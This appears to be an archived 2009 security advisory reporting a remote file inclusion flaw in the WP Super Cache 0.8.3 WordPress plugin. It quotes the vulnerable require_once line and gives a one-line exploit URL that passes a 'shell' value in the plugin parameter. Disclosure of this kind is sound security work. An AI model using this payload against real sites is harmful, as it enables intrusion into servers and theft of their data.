Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22207
HistoryJul 23, 2009 - 12:00 a.m.

wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability

2009-07-2300:00:00
vulners.com
10

===========================================================================================

[o] wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion
Vulnerability

   Software     :  WP Super Cache v0.8.3
   Vendor       :  http://wordpress.org/
   Download     : 

http://downloads.wordpress.org/plugin/wp-super-cache.0.8.3.zip
Author : Cru3l.b0y
Home : WwW.DeltaHacking.Net
Description : A very fast caching engine for WordPress that
produces static html files.

[o] Vulnerable file

     wp-cache-phase1.php

            require_once( $plugin );

[o] Exploit

        http://localhost/[path]/wp-cache-phase1.php?plugin=shell